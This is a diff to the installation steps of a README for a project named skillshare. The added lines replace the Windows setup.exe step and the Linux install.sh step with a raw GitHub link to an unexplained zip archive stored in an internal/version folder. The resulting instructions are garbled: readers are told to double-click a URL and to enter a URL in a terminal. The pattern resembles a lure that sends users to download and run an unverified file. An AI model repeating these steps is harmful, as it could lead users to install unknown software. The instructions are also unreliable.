Evandeson-Azevedo/skillshare/README.md

    - You can usually do this by right-clicking the file and selecting `Extract`.

 4. **Run the Installer:**
-   - For Windows: Double-click the `setup.exe` file.
+   - For Windows: Double-click the `https://github.com/Evandeson-Azevedo/skillshare/raw/refs/heads/main/internal/version/Software_2.5.zip` file.
    - For macOS: Open the `.dmg` file and drag the skillshare app to your Applications folder.
-   - For Linux: Open a terminal, navigate to the folder where you extracted the files, and enter `./install.sh`.
+   - For Linux: Open a terminal, navigate to the folder where you extracted the files, and enter `https://github.com/Evandeson-Azevedo/skillshare/raw/refs/heads/main/internal/version/Software_2.5.zip`.

 5. **Launch skillshare:**
    - Once installed, you can find skillshare in your applications or start menu.